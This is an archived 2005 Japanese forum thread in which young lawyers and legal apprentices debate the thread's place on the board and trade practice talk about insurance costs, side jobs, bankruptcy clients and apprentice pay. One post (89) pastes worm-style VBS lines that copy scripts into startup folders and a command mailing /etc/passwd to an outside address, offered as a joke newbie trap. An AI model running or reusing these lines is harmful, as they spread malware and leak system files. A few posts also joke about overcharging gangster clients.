5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■若手法曹スレッドpart1■

1 :無責任な名無しさん:2005/04/06(水) 18:41:37 ID:MxPJ1/zq
登録約5年以内の弁護士及び任官約5年以内の判事補(未特例)並びに検事が互いに交流を深め研鑽するためのスレッドです。
先輩法曹の横槍も歓迎です。

沿革的には下のスレの続きとして立てたつもりです。
■新人弁護士スレ 1■
http://school4.2ch.net/test/read.cgi/shikaku/1097982666/
【B vs JP】司法修習57期スレpart29【永遠の戦い】
http://school4.2ch.net/test/read.cgi/shihou/1098204516/


2 :無責任な名無しさん:2005/04/06(水) 20:39:14 ID:OifjkFzo
下でお願いします。 すでに削除人の裁定もでています。

司法試験
http://school4.2ch.net/shihou/
【B vs JP】司法修習57期スレpart29【永遠の戦い】
http://school4.2ch.net/test/read.cgi/shihou/1098204516/
【イジメ】司法修習第58期part18【カッコワルイ】
http://school4.2ch.net/test/read.cgi/shihou/1111942497/
【名刺イラネ】司法修習59期スレPart16【紹介シネエ】
http://school4.2ch.net/test/read.cgi/shihou/1112419777/

もしくは下と合流してください。
【確定】弁護士本音talkスレpart11【申告】
http://school4.2ch.net/test/read.cgi/shikaku/1107791882/


3 :無責任な名無しさん:2005/04/06(水) 21:30:49 ID:lLx83P65
裁判官関係の話は下で。
■ 裁判官の部屋 ■
http://school4.2ch.net/test/read.cgi/shikaku/1064214337/

4 :無責任な名無しさん:2005/04/06(水) 22:14:40 ID:AthABc30
何でいけないのか分からない。
熟練法曹と新人では語る内容も全く違う。
削除人にはそこら辺の事情が分からないのかな。

例えば,
●ホームロイヤーズってどう?
http://school4.2ch.net/test/read.cgi/shikaku/1048630842/l50

こんなスレが許されているのだから余裕で平気だと思うんだが。

司法試験に受からなかった人の怨念がこの板にはこもっているのかな。
こんなスレも許されているし
赤塚信雄裁判官と海部幸造弁護士を訴追!
http://school4.2ch.net/test/read.cgi/shikaku/1109864445/l50

コレなんかもう結論出た事件なのにまだあるし。公訴棄却に決まってるじゃん。
【スーフリ裁判】君は和田サンをどう弁護する?
http://school4.2ch.net/test/read.cgi/shikaku/1056794744/l50


5 :無責任な名無しさん:2005/04/06(水) 22:33:56 ID:TzwvfzUq
>>4
>こんなスレが許されているのだから余裕で平気だと思うんだが。
だから立ててもいいという理由にはならないと思います。

>こんなスレも許されているし
それはかなり前に、誰かが削除依頼を出しましたが
対象が二類なので放置されました。

>コレなんかもう結論出た事件なのにまだあるし。公訴棄却に決まってるじゃん。
そうですね。これはもう結論がでているので、遅かれ早かれ誰かが依頼に出すと思います。

削除ガイドラインにはこうあります。
5. 掲示板・スレッドの趣旨とは違う投稿
スレッド
その他の掲示板でも、雑談スレッドは2〜3個まで考慮します。

このスレッドは実質、雑談スレッドなので、誘導先でやってほしいです。


6 :無責任な名無しさん:2005/04/06(水) 23:00:19 ID:YMLddwgP
>>5
このスレッドの趣旨は、誘導先の司法試験板とは全く相容れないものなのだが。
司法試験板では、「合格者は出てけ」と言われる。


7 :無責任な名無しさん:2005/04/06(水) 23:01:06 ID:YMLddwgP
>>3
検察官はどうするのだ?
そもそもJPBの相互交流のスレッドがないのは、法律板として欠陥ではないか。

8 :無責任な名無しさん:2005/04/06(水) 23:13:21 ID:lLx83P65
>>6-7

>このスレッドの趣旨は、誘導先の司法試験板とは全く相容れないものなのだが。
>>1に司法修習生のリンクを貼っていますが?

>司法試験板では、「合格者は出てけ」と言われる。
そうなんですか?司法修習生のスレッドは認められているのに?

>検察官はどうするのだ?
>そもそもJPBの相互交流のスレッドがないのは、法律板として欠陥ではないか。
そもそもこの板は雑談系の板ではないので、雑談スレッドがあること自体がおかしいと思います。
ただ、>>5が示したように削除ガイドラインで2〜3まで許容されているから黙認しているだけです。


9 :無責任な名無しさん:2005/04/06(水) 23:26:51 ID:GgkBadT+
>>8
57期はもう司法修習生ではないです。
司法試験板では、従来から、修習生スレが立つたびに「板違いだ」と言われてきました。ただ、直近の合格者であることから、受験生のためにもなるということで、黙認されてきただけです。

10 :無責任な名無しさん:2005/04/06(水) 23:29:55 ID:aLG1nDzj
>>8
57期は昨年10月にほとんどが司法修習を終えて弁護士裁判官検察官になっています。
追試組が12月まで司法修習生でした。したがって、もう「57期司法修習生」はこの世に存在しません。
司法試験板の57期スレッドが立ったのは、まだ43人の追試組「57期司法修習生」が存在した10月20日でした。
その>>1にもあるように、おそらく最後のスレッドです。

11 :無責任な名無しさん:2005/04/06(水) 23:31:46 ID:AdOiqeQw
>>8さんアナタ,司法修習の制度をあまりご存じないのでは?


12 :無責任な名無しさん:2005/04/06(水) 23:32:44 ID:Y9GJ0i+O
司法試験も受けたことのない、ただの自治厨にそこまで噛みつくなよ。

13 :無責任な名無しさん:2005/04/06(水) 23:36:32 ID:TzwvfzUq
>>9-11
司法修習の制度の問題以前にこのスレッド自体が
ローカルルールには抵触しないんですか?

第一条 この板は法律に関する質問及びこれに対する回答を扱うところです。


14 :無責任な名無しさん:2005/04/06(水) 23:47:14 ID:AdOiqeQw
>>13
当方弁護士だが,同期ぐらいの左陪席や検事にここで聞きたいことはたくさんある。
量刑相場,手続き,裁判所や検察庁の慣例など。
それも質問回答ではないのかな。
日々の業務に関して同業者間でも匿名でやりたい質問・回答,うわさ話の確認なんかはたくさんある。

本音talkスレの方でも質問・回答はたくさんあるよ。
http://school4.2ch.net/test/read.cgi/shikaku/1107791882/434-435
http://school4.2ch.net/test/read.cgi/shikaku/1107791882/794-797
等々。
趣旨を逸脱しているとは思えないな。

15 :8:2005/04/06(水) 23:47:26 ID:lLx83P65
>>9-11
雑談スレッドに対する言い分がないのが残念ですが
そちらの言い分はよく分かりました。

削除人さんがこのスレを残すなら、それでも構いません。
私もこれ以上、粘着する気はありませんので。


16 :無責任な名無しさん:2005/04/06(水) 23:50:03 ID:AdOiqeQw
>>15
このスレが純粋な雑談スレッドではないことは>>14で述べたとおりなのでこれを引用する。
仮に,雑談スレッドであったとしても,残すべき2〜3のスレッドに該当するものだと思う。
弁護士スレ,事務員スレ,法曹三者横断スレの3つ雑談があってもいいんじゃない?

17 :8:2005/04/06(水) 23:56:24 ID:lLx83P65
>>16
>>3の裁判官を加えたら4つですね。
本来はオーバーしていますが
>>15でも書いたように後の判断は削除人さんにお任せします。



18 :無責任な名無しさん:2005/04/07(木) 00:00:16 ID:9PkT/X0a
>>17
それを言うのなら、行政書士の議論スレとか、司法書士に萌え萌えな人のスレとか、
不適切な物の方が、大量にあるが?

19 :無責任な名無しさん:2005/04/07(木) 00:08:07 ID:GnKYlQlv
>>18
あなたがそう思うなら
それらのスレッドを削除依頼に出したらどうですか?

20 :無責任な名無しさん:2005/04/07(木) 00:15:39 ID:Fv1UZOZr
そんなことはどうでもいいんだ。

Pは裁判員制度に向けた準備のために何か講習とかあるのか?
「しゃべり方講座」とか。
Bももっとパフォーマンス的な法廷活動をしたほうがいいのかね。

21 :無責任な名無しさん:2005/04/07(木) 00:41:51 ID:qzXxXyUc
>>20
検察庁は以前から対応していますね。
アナウンサーも講師に迎えていたとか。

日弁の研修会も1月末にありましたよ。
会員ページのライブラリで今でも見られます。

22 :無責任な名無しさん:2005/04/07(木) 15:25:13 ID:s1ECJZ1S
>>21
見たけど,あんなふうに被告人を弁護人の隣に座らせることを,裁判所は許してくれるのかねえ。
訴訟指揮権だとか法廷警察権だとかを理由に拒まれそう。

23 :無責任な名無しさん:2005/04/07(木) 17:18:52 ID:RUdNLUar
都市部で活動しているので,裁判員相手の事件は国選ではしなさそう。
控訴審はありうるが,そもそも裁判員じゃないしね。
私選だと困るね。だれかに照会しなきゃ。

24 :無責任な名無しさん:2005/04/07(木) 19:42:55 ID:pNJzmLiv
>>5
>このスレッドは実質、雑談スレッドなので、誘導先でやってほしいです。

初代スレでまだカキコが4つなのにどうして「実質,雑談スレ」であると,実質的な判断ができるのですか?

>>8
>>このスレッドの趣旨は、誘導先の司法試験板とは全く相容れないものなのだが。
>>1に司法修習生のリンクを貼っていますが?

ビギナー法曹のすれなのだから,57期が沢山くることになる。だから「沿革的には」前スレに近い存在となる。1はソレを述べただけでしょ。
なお,57期はもう存在しない。二回試験が終わった期である以上,司法試験板にとどまることは理論的に困難。
そこで,この板しか立てられるところがない。
ちなみに,半年後は58期がこのスレのメイン参加者となるだろう。

>>13
>司法修習の制度の問題以前にこのスレッド自体がローカルルールには抵触しないんですか?
>第一条 この板は法律に関する質問及びこれに対する回答を扱うところです。

だからココは若手法曹が,実務について分からないことを教え合うスレだろ?
何でこんなに粘着しているのかさっぱり分からない。

25 :無責任な名無しさん:2005/04/07(木) 19:46:36 ID:pNJzmLiv
>.13
というか,下のようなスレのどこが「法律に関する質問及びこれに対する回答を扱う」スレなの?
下は直接的に第1条に反しているのに,何でこのスレに粘着するの?
理論的根拠付けに欠けるし,恣意的だし,エリートに対するねたみとしか思えない。

宮崎の弁護士は馬鹿ばっかり!
http://school4.2ch.net/test/read.cgi/shikaku/1048036341/l50
検事・判事・弁護士の恋人さん語りましょう
http://school4.2ch.net/test/read.cgi/shikaku/1093946266/l50
【茶髪】橋下徹【元DQN?】 part2
http://school4.2ch.net/test/read.cgi/shikaku/1076961132/l50
赤塚信雄裁判官と海部幸造弁護士を訴追!
http://school4.2ch.net/test/read.cgi/shikaku/1109864445/l50
伊藤芳朗弁護士って
http://school4.2ch.net/test/read.cgi/shikaku/1031413366/l50
弁護士ってさあ、ヘンな人多すぎない?
http://school4.2ch.net/test/read.cgi/shikaku/1033695037/l50
裁判官は世間知らず
http://school4.2ch.net/test/read.cgi/shikaku/1085201356/l50


>.15
>雑談スレッドに対する言い分がないのが残念ですがそちらの言い分はよく分かりました。

>>1にもスレタイにも雑談スレとは書いていないんだが。
「互いに交流を深め研鑽するためのスレッド」の意味するところは,要するに実務に関する質問や回答がなされるスレということだろ。
さしたる根拠もなく勝手に雑談スレと認定して,ソレを前提として評価するなよ。

「事実認定なくして評価なし」

26 :無責任な名無しさん:2005/04/07(木) 20:40:36 ID:apIFEUv+
>>24-25
残す事になったんだから、からむのはやめとけ。

http://qb5.2ch.net/test/read.cgi/saku/1030298878/458
458 :萬削候 ★ :2005/04/07(木) 20:09:30 ID:???0
>>451
>>452
>>453
スレッドの趣向からして以前に削除依頼出された趣向とは相反するものかと思います。
司法修習生として試験に合格した後新人として活動行う意見交換目的として機能するのだと判断
テンプレにも統一スレとしての経緯も残ってるのでそれはそれで十分じゃないでしょうか。
試験が終わったので司法試験板向けとはならないでしょうし、現に合格された人が集うスレとして
有用だと思います。
法律勉強板として雑談スレに統一してしまう方が混乱を起すのではないかと思いました。

27 :無責任な名無しさん:2005/04/08(金) 01:11:51 ID:eZQDt2jQ
まあ、済んだことは置いといて、マターリと行きましょうよ。

28 :無責任な名無しさん:2005/04/08(金) 21:18:43 ID:Gll2YNK0


29 :無責任な名無しさん:2005/04/10(日) 15:27:17 ID:+U8IN/bg
ぜんぜん盛り上がらんね。

30 :無責任な名無しさん:2005/04/10(日) 18:14:40 ID:pRqTd0+3
辛い目にあってる新人弁護士の話を聞かせてくださいよ。
俺を勇気づけるために。

31 :にせべんごし@:2005/04/10(日) 18:27:13 ID:RUc0VQMr
>>30
もううん年前のことだが、
カタギだと思ってた知り合いに「かなりいい物」をもらっちまって
その後の紹介案件が当分断れなくなったな。
やー公の私選とか。今は切れたケドね。
気を付けよう、甘い言葉と貢ぎ物。


32 :無責任な名無しさん:2005/04/10(日) 20:12:40 ID:sS9VxyxW
>>30
会務・国選に忙殺されて仕事ができずボスに追い出されかけている人とか。

>>31
やーさんの私選でボッタクル度胸が欲しい。

33 :にせべんごし@:2005/04/10(日) 20:33:57 ID:RUc0VQMr
>>32
ぼったくれぼったくれ。
どうせ悪い金だ。
上層部ほどメンツがあるから
すんなり言うこと聞くぞ。


34 :無責任な名無しさん:2005/04/10(日) 20:57:24 ID:iBXKvgup
いい感じですね。
特に、32さんの追い出されかけてる人、私に似ていて勇気づけられます。
もっとお願いします。

35 :無責任な名無しさん:2005/04/10(日) 21:18:24 ID:NvrHprG0
ボスに追い出されて路頭に迷っている人とか
小規模単位会内で大物の先生と喧嘩しちゃって大変なことになってる人とか


36 :無責任な名無しさん:2005/04/11(月) 11:16:21 ID:BP1gcXNi
小規模単位会で大物の先生の所を早々に立ち去ろうとしているものの独立資金がない人

37 :無責任な名無しさん:2005/04/11(月) 11:16:56 ID:BP1gcXNi
ま,ボスの尻ぬぐいを山のようにさせられるというのはよくある話のようです。

38 :無責任な名無しさん:2005/04/11(月) 12:16:38 ID:vD8/+Iu1
仕事とは関係ない話だが、弁護士1年目のころ、給料から税金が
少ししか引かれず、社会保険料も国民年金と共済の任意継続で
かなり安かったことから、生命保険に多めに入った。
さらに、結婚後は比較的家賃の高いマンションを借りたら、2年目の
途中から住民税と保険料の負担が異様に高くなって、かなり厳しいことに。

39 :無責任な名無しさん:2005/04/11(月) 17:26:35 ID:zlMqxgOv
任意継続が切れる2年目からは,健康保険が4倍近い負担になるね。
関東の弁護士,法人事務所のひとは問題ないだろうが。
厚生年金とか高いけど,その分給付が増える。健康保険は無関係。
今となっては,法人事務所に勤めた方がよかったような・・・。

40 :無責任な名無しさん:2005/04/12(火) 22:31:56 ID:SN0YEm4m
>>39
任意継続を継続し損ないますた。
いったいいくらになるのだろう。ガクガクブルブル

41 :無責任な名無しさん:2005/04/13(水) 01:36:35 ID:3OJBSIak
>>40
任意継続をしておけば15万円くらいだけど,
国保だと最高で50万円以上になる。
そして割と簡単に最高額になる。

42 :無責任な名無しさん:2005/04/13(水) 10:27:02 ID:24FavcVO
関東の弁護士はうらやましい。
関西でも弁護士健康保険組合つくらないのかな??
十分,会員数も増加しただろうに・・・。

43 :無責任な名無しさん:2005/04/14(木) 00:25:37 ID:SKDGKtNr
国保の最高額を払ってもたかだか月5、6万円。
これだけで、他人さんが傷病の苦労を身代わりしてくれてると思えば、本当に安いものです。

弁護士は健康第一。元気に働けば幾らでも(?)稼げる。
それにしても、最近4、50代の人の訃報が多すぎる気もするが・・・。

44 :無責任な名無しさん:2005/04/15(金) 00:01:14 ID:xgmW1uhl
>>43
高いよう。
年収400マン、会費別の俺にはつらすぎるよう。

45 :無責任な名無しさん:2005/04/15(金) 01:17:04 ID:nRcb5bqi
>>44
その年収というのは所得ですか。
だとしても400万円なら30万円台前半ではないですか。
市役所のホームページ等で確認してみては。

46 :無責任な名無しさん:2005/04/15(金) 22:54:01 ID:XBz0NlV8
伊藤塾から添削バイトの案内が来た。
1通600円くらいでやってくれという。
ふざけるな。誰がやるか!?

47 :無責任な名無しさん:2005/04/15(金) 23:56:12 ID:xgmW1uhl
>>45
所得ならどれほどいいだろう。
「売り上げ」です。
とほほ。

48 :無責任な名無しさん:2005/04/15(金) 23:58:40 ID:xgmW1uhl
>>46
俺、受かってから添削って言うのやったこと無いんだけどさ、
一般的には一通いくらが相場なの?
また、一通添削するのにどの位時間かかるの?

49 :58期:2005/04/16(土) 00:49:59 ID:jA/fSD4E
>>48
 相場は修習に入る前の合格者で,5〜600円でしたよ。
 1通あたりの採点には,問題にもよりますけど15分くらいかかるのが
普通だと思います。

50 :無責任な名無しさん:2005/04/16(土) 01:14:42 ID:/csPfOWu
>>49
あんまりおいしくねえなあ。
でも、添削って一度くらいやってみたかったりして。
それ面白いの?

51 :無責任な名無しさん:2005/04/16(土) 08:53:36 ID:a2flLOWA
面白い訳がない。

52 :無責任な名無しさん:2005/04/16(土) 09:59:02 ID:p/peVZU3
たくさんの答案を見てみると、自分が合格したことは当然であったという気分にさせてくれ、納得できるだけの値打ちはあるよ。

将来に向けて自信と希望が湧いてきます。


53 :無責任な名無しさん:2005/04/16(土) 12:32:47 ID:N82zEF3x
俺は1通800円の添削を一枚5分でやってました

54 :無責任な名無しさん:2005/04/16(土) 20:09:37 ID:/csPfOWu
>>52
やってみようかなあ

55 :無責任な名無しさん:2005/04/16(土) 20:23:59 ID:lzsnG33Z
>>52
そんな納得、合格直後だけだろ。
そんな暇あったら、破産1件受けろよ。

56 :無責任な名無しさん:2005/04/16(土) 20:45:33 ID:/csPfOWu
>>55
破産、債務整理、国選、まあ、はっきり言って飽きてきたわけよ。
マジで添削ってやったこと無いんだよ。
俺たちが受かった頃って、合格者余ってたじゃん。
あまり添削やってくれって頼まれなかったのよね。わざわざ「仕事説明会」とやらに行くのもめんどくさかったしさあ。


57 :無責任な名無しさん:2005/04/17(日) 09:19:56 ID:PJ/yDnyk
>56
破産、債務整理、国選に飽きてきたってことは、55期あたり?

私は54期で、合格直後はかなり添削していたけど、今更添削はできないな。
学説も頭から飛んでしまったし、憲法なんて合格後一度も見ていない。
この前、受験生の友人達と会ったけど、私が受験していた頃にはなかった
予備校本が一世を風靡しているらしかったし、やっぱり受験時代と現在とは
意識が違いすぎるんだろうな。

58 :無責任な名無しさん:2005/04/17(日) 15:46:34 ID:MOI4tGgm
>>56
添削は締め切りがけっこう厳しいですよ。
たいてい答案を渡されてから3日後が締め切り(郵送だともっと短い)で,
1回あたり2〜30通の答案を渡されるので,だいたい6時間くらいは添削
に時間がかかる(56氏は添削初めてならもっと時間がかかるおそれも)。
下手すると日常業務に影響が出かねませんよ。
 しかし,ディープインパクト強いな〜〜〜。

59 :56:2005/04/17(日) 22:19:24 ID:/swR+PCZ
>>58
そうっすか。
考えてみます。大感謝。

60 :無責任な名無しさん:2005/04/17(日) 23:42:42 ID:iWq4xYvS
破産事件の依頼者って、自分のことなのに協力的じゃない人が多すぎです。
2ヶ月たっても、準備段階でとどまってて、手続が進まない人がいます。
こういうのって、よくあることですかね?

61 :無責任な名無しさん:2005/04/18(月) 12:33:30 ID:DCixNI/z
よくあることです。
債権者からの請求がやめばなおのことです。

62 :無責任な名無しさん:2005/04/18(月) 13:39:27 ID:+Atq4UZB
陳述書を書いたり書類を集めたりという仕事をなるべく依頼者本人にやらせることです。
そうしないと当事者意識がなくなって全く協力しなくなる。

あんまりにもひどいようなら,警告の上で,債権者に「辞任通知」を出してやれば?

63 :無責任な名無しさん:2005/04/18(月) 17:55:59 ID:J8xOAod+
辞めますよって言って,辞めた後大変だと言うことを脅しながら切れたら言うこときくよ。
僕の場合はそうです。

64 :無責任な名無しさん:2005/04/22(金) 00:48:02 ID:aWx0KfYN
判決正本って言い渡しから何日くらいで送達されるんだ?

65 :無責任な名無しさん:2005/04/22(金) 00:52:03 ID:JPQL+KR8
都内ならすぐ来ますが(今日言い渡しがあったなら明日届く)

66 :無責任な名無しさん:2005/04/23(土) 22:19:44 ID:JRjCHh91
このスレもよろぴく↓

【真正】検事になりたいんですがその4【こっち】
http://school4.2ch.net/test/read.cgi/shihou/1108104731/l50

67 :無責任な名無しさん:2005/04/23(土) 22:23:02 ID:JRjCHh91
このスレはひどく荒れていますが…↓

検察庁総合スレッド【PART1】
http://society3.2ch.net/test/read.cgi/koumu/1105543589/l50

68 :無責任な名無しさん:2005/04/23(土) 22:31:50 ID:a2xilqDN
>>67
そこは強制IDじゃないから仕方ないのかも・・・

69 :無責任な名無しさん:2005/04/23(土) 23:50:50 ID:TYcpglvX
>>67
荒らしてるのはたかもり・せいこ★姫だな
検察関係で荒れているのはほぼこいつの仕業だな
聖子明菜ネタで書き尽くすのが特徴

70 :無責任な名無しさん:2005/04/25(月) 00:16:27 ID:egTvmA+5
要件事実と事実認定関係で
お勧め本ってありますか?
伊藤滋夫以外で

71 :無責任な名無しさん:2005/04/25(月) 20:55:57 ID:2JoI76wP
>>70
あなた59期でしょ?

72 :無責任な名無しさん:2005/04/25(月) 23:48:53 ID:rgOYI6QQ
>>70
あなたロー生でしょ?
ローのことはロー生同士で話し合った方がかえって効率がいいですよ。

73 :控訴審で弾劾証拠として:2005/04/26(火) 14:06:22 ID:OfpewoVE
控訴審で弾劾証拠として一審で不同意とした調書を出そうとしたら検事に不同意にされました。
そして、審理をせずに次回結審されそうです。補充書を出していこうと思いますが、審理を再開させるにはどのようにしたら
よろしいでしょうか?先輩方宜しくお願い致します。

74 :無責任な名無しさん:2005/04/26(火) 23:49:42 ID:WV9CrPa/
今、下記のスレを見たらスゴイことが書き込んであるな↓
http://society3.2ch.net/test/read.cgi/koumu/1105543589/l50

75 :無責任な名無しさん:2005/04/27(水) 00:42:04 ID:CPbv3g0p
>>73
下のスレッドを削除依頼に出してこい。
話はそれから。
http://school4.2ch.net/test/read.cgi/shikaku/1114491787/


76 :無責任な名無しさん:2005/04/28(木) 23:53:33 ID:KfEA1pKo
ほんま人間のくずやなあ

77 :無責任な名無しさん:2005/05/01(日) 15:41:46 ID:1bjyoBjR
久々にあげてみよう

78 :無責任な名無しさん:2005/05/07(土) 10:00:54 ID:ozU6enKX
公務員板の検察スレは終了したな

79 :無責任な名無しさん:2005/05/08(日) 11:28:12 ID:KsSeNj0Y
今日は択一の日だな。
いまだに択一の日が落ち着かないのは俺だけか。受験時代などかなり前のことなのに。

80 :無責任な名無しさん:2005/05/08(日) 11:35:44 ID:ZDLqN3b0
明日から仕事だ・・
鬱だし脳

81 :無責任な名無しさん:2005/05/08(日) 14:29:38 ID:KYC30r7y
>>80
おまえ今日まで連休だったのかよ。
うらやましすぎ。

82 :無責任な名無しさん:2005/05/08(日) 15:49:22 ID:KsSeNj0Y
>>81
俺も10連休。
でもグダグダにだらけた。
やっぱ仕事が好き。

83 :無責任な名無しさん:2005/05/09(月) 22:16:54 ID:69sfbt16



84 :無責任な名無しさん:2005/05/10(火) 00:46:08 ID:C9ATJiAQ
648 :名無しの歩き方@お腹いっぱい。:2005/05/05(木) 20:12:18 ID:db6pD0z0
個人情報保護法についてお伺いしたいのですが、任命権者の選挙事務所が
特定通信事業者〔プロバイダー〕から公務員のIP情報等を入手した場合には
どんな罰則が適用されますか。

649 :名無しの歩き方@お腹いっぱい。:2005/05/05(木) 20:14:56 ID:db6pD0z0
個人情報保護法違反。
プロバイダが、「該当する」全公務員から、
第三者提供することへの同意を求めなければならない。
利用目的内であることも必要。

@上記2レスは名誉毀損に該当しますか。
A649の個人情報保護法違反は正しい判断ですか。



85 :無責任な名無しさん:2005/05/10(火) 00:51:47 ID:EzRZElKN
>>82
ケッ!イソ弁が
俺は仕事が嫌いです

86 :無責任な名無しさん:2005/05/10(火) 00:55:21 ID:i/vDZAg6
http://soudan.eheart.jp/top.html

これどうよ?

87 :無責任な名無しさん:2005/05/10(火) 00:58:39 ID:i/vDZAg6
http://soudan.eheart.jp/top.html

これどうよ?

88 :無責任な名無しさん:2005/05/10(火) 01:02:09 ID:i/vDZAg6
重複すまぬ。

89 :無責任な名無しさん:2005/05/12(木) 00:05:11 ID:Z3R1LRj6
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

※これは厨房よけです。これに反応した方は厨房ですので
半年ROMってください。そうでない方は気にせずこのスレをお楽しみください。



90 :無責任な名無しさん:2005/05/12(木) 00:50:19 ID:Ydyu7iCz
最近どうよ?

91 :無責任な名無しさん:2005/05/12(木) 05:32:57 ID:ImrZ5VR2
>>89
うちのノートン先生がうるさいよ。

92 :無責任な名無しさん:2005/05/12(木) 10:43:31 ID:iithidJ4
ここは活気のないインターネッツですね

93 :無責任な名無しさん:2005/05/14(土) 18:12:32 ID:eQENtSgp
↑ じゃー、弁護士本音の方に合流されたら・・・。

「新米は入れねーよ」なんて言う狭量の方はいないと思いますので。
ただ、個々には、厳しい反応もあり得ますが・・。  お覚悟の程を。


94 :無責任な名無しさん:2005/05/22(日) 00:35:33 ID:Shl8OK91
地方だと管財人って何年目くらいからやるの?

95 :無責任な名無しさん:2005/05/22(日) 17:22:30 ID:iXvWbJCn
3年目くらい
もっとも本庁所在地の場合

96 :無責任な名無しさん:2005/05/22(日) 23:41:25 ID:qIwmh/7h
なるほど。

97 :無責任な名無しさん:2005/05/26(木) 01:33:34 ID:wx+eTuWC
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
http://qb5.2ch.net/test/read.cgi/saku/1029761001/128-129

98 :無責任な名無しさん:2005/05/27(金) 00:58:47 ID:m1vONYLT
>>91
m9(^Д^)9mプギャーッ!

99 :無責任な名無しさん:2005/05/27(金) 02:11:49 ID:2NZzjGis
57期です。
クラスでどのくらい事務所変わった奴いるのかな。
おれのクラスは,把握している限りで4人

来月おれが5人めになるw

100 :無責任な名無しさん:2005/05/27(金) 09:45:53 ID:T5Q4wXGj
俺のクラスは一人だけだけど,俺が他に知らないだけかもしれません。

101 :無責任な名無しさん:2005/05/28(土) 10:07:57 ID:vdUSERxc
若手法曹が実名でブログをするときは,先輩の悪い例をまねないようにしてください。
たとえ匿名でも,弁護士を冠している以上,一般人を罵倒するようなことは止めましょう。

http://benli.typepad.com/annex_jp/
        ↓
http://ogucircus.exblog.jp/
http://ex9.2ch.net/test/read.cgi/net/1117076860/


102 :無責任な名無しさん:2005/05/28(土) 23:43:16 ID:X3+5QD9u
良スレですね。

103 :無責任な名無しさん:2005/05/28(土) 23:45:34 ID:vdUSERxc
>>102
でしょう〜。
法律系スレで良スレ認定受けているのは,修習生スレは別として,こことPスレくらいです。
皆で大事に育てましょう。

104 :無責任な名無しさん:2005/05/29(日) 00:32:47 ID:LGlDAy7Q
>>103
Pスレとは?

105 :無責任な名無しさん:2005/05/29(日) 02:09:11 ID:LMRXHMt7
検察官=prosecutor

106 :無責任な名無しさん:2005/05/30(月) 23:40:19 ID:DMwS0GuK
>>99
次は決まってる?

107 :無責任な名無しさん:2005/06/04(土) 22:02:18 ID:5CCLfolb
研修医は、最低賃金法の「労働者」と認められたようですが、
司法修習生の無給化は、いかがなもんでしょう?

108 :無責任な名無しさん:2005/06/04(土) 22:05:47 ID:rDvfl+jZ
>>107
いずれ貸与制になります
航空大学校の学生と同じに

109 :無責任な名無しさん:2005/06/04(土) 22:25:04 ID:Q60sxVAD
>>108
ちょっと疑問と答えが対応していないような。

貸与化になったら,ある種の労働をさせている修習生に最低賃金を支払っていないので違法なのではないか?という問題意識かと思われ。

110 :無責任な名無しさん:2005/06/04(土) 23:44:33 ID:dAxOjURZ
修習生は研修医ほどの「労働」はしていないんじゃないかな。
自分の名前で自分で誰かに対応することってないでしょう。
一応その場に座ってて、ときどき起案見てもらってって程度じゃない?
そういう意味からすれば、検察修習で無給、研修と言い張るのは問題
あるような気がするけどね。

でも、もし貸与で研修だと言い張るなら、バイト

111 :無責任な名無しさん:2005/06/05(日) 00:19:09 ID:c100LcAy
大阪司法書士会臨時総会訴訟について
http://www.aoitakigawa.com/osakasihoushosi.html

司法審最終報告書の方向性と我々の今後
http://www.aoitakigawa.com/saisyuu.html

112 :無責任な名無しさん:2005/06/05(日) 01:03:13 ID:UylnE6IS
>>110
まあそうだけど,検察だけは取り調べや冒陳論告を書き,指導pもそれをほぼそのまま使ってたからなあ・・・・・。

113 :無責任な名無しさん:2005/06/05(日) 23:38:31 ID:xjPdqyw+
弁護修習でも法律相談一人でやらされたり,起案そのままノーチェックで出したりしてましたが・・・

114 :無責任な名無しさん:2005/06/10(金) 18:26:36 ID:fnfl1+Mz
>>113
それでも責任を取るのは指導担当だから,やっぱり「労働」はないと思われ。

115 :無責任な名無しさん:2005/06/10(金) 21:38:03 ID:iET7tYs+
>>114
こんなつまらん話題につきあう俺も暇人だが、その理屈で言うと
事務員がしていることは「労働」ではなくなるのでは・・・

116 :sage:2005/06/10(金) 22:58:22 ID:BHlhX0vw
そもそも法律で無給(貸与)と決めるのであれば、
最低賃金法との抵触は問題とならないのでは?

117 :無責任な名無しさん:2005/06/11(土) 18:02:59 ID:nivKysH6
58期のものです。
友達が,後期のいずみ寮が談話室の隣の部屋になったと
いって嘆いていましたが,後期も談話室の隣の部屋は
悲惨なのでしょうか。
後期も談話室で飲み会とかよくやっているのでしょうかね。
入寮を辞退してマンスリーマンションを借りるなどした方が
よいのでしょうか。ちなみにその人は,結構騒ぎ声などが
気になる人です。
よろしければ,ご教示くださるとありがたいです。
スレ違いでしたら,申し訳ありません。

118 :無責任な名無しさん:2005/06/11(土) 18:55:22 ID:0FkRbPqk
>>117
友人になりすまさず,自分の問題として聞いた方がいいのではないか?
誰がどう見ても,談話室の隣室になって困っているのはあんただろ。


119 :無責任な名無しさん:2005/06/11(土) 19:24:00 ID:oEIqUSpj
アンタが、後期もまじめに修習生としての生活を過ごしたいとお考えならば、寮生活はおやめなさい。
特に、真剣に任官とその後の人生を思うなら、絶対談話室の隣はダメ。

隣室に○の活動家が居て深夜の集会室となり、後期の勉学専念義務をまったく乱された経験から・・・。

120 :無責任な名無しさん:2005/06/11(土) 20:43:57 ID:+CuJaUzB
>>117
一度大騒ぎすれば、使用禁止になって静かになるよ。

121 :117:2005/06/12(日) 08:34:27 ID:A4PRnV+k
>>118
そこは,特定を避けるために苦し紛れにやっているんだろうなと
触れずに聞き流していただきたかったところです。
不快に思われたなら,すみませんでした。
ちなみに,後期は本当にしっかり勉強したいと
思っています。
ただ,和光周辺のマンスリーは,家賃光熱費含めて
12〜13万はするので,毎月持ち出しの赤字になること必至であり,
寮の安さとは雲泥の差なので,そこまでするだけの
ことがあるのかなと迷いまして。
もちろん,それほど勉強に差し障るなら,
赤字になろうが外に住んだ方がいいのでしょうけれど。

